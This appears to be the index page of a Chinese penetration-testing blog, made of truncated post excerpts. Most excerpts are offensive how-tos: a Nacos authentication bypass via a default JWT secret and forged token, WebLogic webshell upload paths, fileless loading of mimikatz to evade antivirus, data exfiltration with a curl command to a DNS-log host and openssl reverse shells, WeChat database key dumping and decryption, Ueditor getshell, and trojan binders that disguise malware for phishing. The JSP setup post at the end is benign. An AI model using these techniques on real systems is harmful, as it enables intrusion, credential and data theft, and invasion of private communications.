Hyyrent blog

Nacos身份认证绕过由于secret.key值为默认 12345### The default token(Base64 String):nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789### 2.1.0 版本后nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789 可使用 https://jwt.io/#debugger-io 生成可用的token 如果需要登录至nacos，输入任意账密进行抓包 把回显包替换为下面这个 123456789101112HTTP/1.1 200Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY ...

xray1.9.4破解 jl修改为jnl，点击补丁保存

weblogic上传getshell路径Linux系统第一种上传目录 123/u01/oracle/wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/css/u01/oracle/wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images 访问路径 1http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp 第二种上传目录 1/u01/domains/osb/servers/AdminServer/tmp/_WL_internal/uddiexplorer/随机字符/war/666.jsp 访问路径 1http://xxxx/uddiexplorer/shell.jsp 第三种上传目录 1/Oracle/Middleware/user_projects/domains/application/servers/AdminServer/ ...

FilelessPELoader免杀加载分享一个好用的PE远程加载项目 https://github.com/TheD1rkMtr/FilelessPELoader 远程内存加载，免杀大部分的杀软 1、首先安装相关python库 1pip install pycryptodome 2、使用aes.py生成两个bin文件，分别为cipher.bin和key.bin 1python aes.py mimikatz.exe 3、使用python开启web服务， 123python -m http.server 80python -m SimpleHTTPServer 8080 4、使用编译好的程序进行远程加载 12FilelessPELoader.exe 192.168.159.3 80 cipher.bin key.bin[+] Usage: FilelessPELoader.exe <Host> <Port> <Cipher> <Key> 同样可以免杀cs上线，测试可以免杀360、火绒、def、eset

dnslog获取完整请求大多数dnslog平台外带数据会发现不能获取全部内容 https://log.xn--9tr.com/ 改用以下地址，但是中文会出现乱码 https://www.log.d48e48337471993e.com/ 或者使用burp自带的dnslog，但是流量告警十分明显 写入文件读取内容1ls -l > aaa.txt; curl -d @aaa.txt http://dnslog地址 实战利用判断是否出网 出网的情况存在HTTP请求出网的情况可以尝试反弹shell https://weibell.github.io/reverse-shell-generator/# 如果被流量设备拦截，可以尝试改用openssl反弹shell VPS上运行 123openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes一直输入回车生成即可openssl s_server -quiet -key key.pem -cert cert.pem -por ...

微信聊天记录提取https://github.com/AdminTest0/SharpWxDump 版本 < 3.7.0.30 只运行不登录能获取个人信息，登录后可以获取数据库密钥 版本 > 3.7.0.30 只运行不登录不能获取个人信息，登录后都能获取 利用前提：新版本微信需要处于登录状态 项目需要使用x86进行编译 运行程序后会生成wechatkey，之后解密可以用上 到此目录下载DB文件，拖到本地进行解密 1C:\Users\用户名\Documents\WeChat Files\wxid_xxxxxxx\Msg\Multi 解密脚本 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849from Crypto.Cipher import AESimport hashlib, hmac, ctypes, sys, getoptSQLITE_FILE_HEADER = bytes('SQLite format 3', ...

DLL劫持DLL简介 在Windows中，许多应用程序并不是一个完整的可执行文件，它们被分割成一些相对独立的动态链接库，即DLL文件，放置于系统中。当我们执行某一个程序时，相应的DLL文件就会被调用。一个应用程序可使用多个DLL文件，一个DLL文件也可能被不同的应用程序使用，这样的DLL文件被称为共享DLL文件。 DLL加载顺序如果程序需要加载一个相对路径的dll文件，它将从当前目录下尝试查找，如果找不到，则按照如下顺序寻找： windows xp sp2之前Windows查找DLL的目录以及对应的顺序： 进程对应的应用程序所在目录； 当前目录（Current Directory）； 系统目录（通过 GetSystemDirectory 获取）； 16位系统目录； Windows目录（通过 GetWindowsDirectory 获取）； PATH环境变量中的各个目录； windows xp sp2之后Windows查找DLL的目录以及对应的顺序（SafeDllSearchMode 默认会被开启）： 默认注册表为：HKEY_LOCAL_MACHINE\System\C ...

Ueditor漏洞捡漏到github上下载 https://github.com/fex-team/ueditor 下载完成后把压缩包解压后重命名为ueditor，新建一个目录，把 ueditor 放到 test 文件夹下 把net目录转化为应用程序 运行过程报错 修改 web.config，添加 <customErrors mode="Off"/> 修改完成后继续出现报错 在C:\windows\temp这个文件夹添加network service用户的权限即可解决 搭建完成 访问首页，会出现如图403的页面 常规的目录扫描 访问login.html为简单的登陆页面，这个点是用来混淆视线的，直接跳过 但我们可以看到目录扫描ueditor下存在以下页面，可以联想到ueditor getshell 1/ueditor/net/controller.ashx?action= 准备一个aspx木马，重命名为png，并放置到VPS上，在该目录下开启http服务 1python -m SimpleHTTPServer 8080 构造上 ...

免杀木马捆绑器分享在实战钓鱼过程中，常常需要把木马伪装成正常的文件，如果文件运行之后没有任何反应，会引起对方的怀疑 这时候就需要木马捆绑器，释放准备的正常文件，降低对方的戒心，下面列举两种简单的方法： https://github.com/H4de5-7/Bundler-bypassvisual studio打开项目，资源文件选择导入 导入木马和需要释放的文件 编译生成 运行释放，bypass360 https://github.com/Yihsiwei/GoFileBinder坑点： 1、命令里exe要放在释放文件前面，不能更换命令顺序，否则生成后无法正常释放 2、go的版本选择的是17，测试发现18版本会生成失败 1GoFileBinder.exe 木马.exe xxx.txt

JavaServerPages学习环境搭建打开idea，创建一个新项目 12345选择 “Maven” jdk1.8组件选择:org.apache.maven.archetypes 下的 maven-archetype-webapp 项目创建后等待资源加载，第一次时间较久 出现下图表示加载成功 配置编译路径和artifact快捷键 ctrl+alt+shift+s 配置tomcat服务器到 http://tomcat.apache.org 下载对应的版本 在web项目中导入tomcat，点击 idea 右上角的 add configuration 选择 other–tomcatserver–local 配置端口，这里避免端口冲突换成8081，上下保持一致即可 导入tomcat包 fix 添加 war 最终效果 无报错启动成功 访问 http://127.0.0.1:8081/maventest/index.jsp JSP Servlet实例 作用：Servlet定义是容器端小程序，用于直接处理后端业务逻辑 选择 webapp 右键标 ...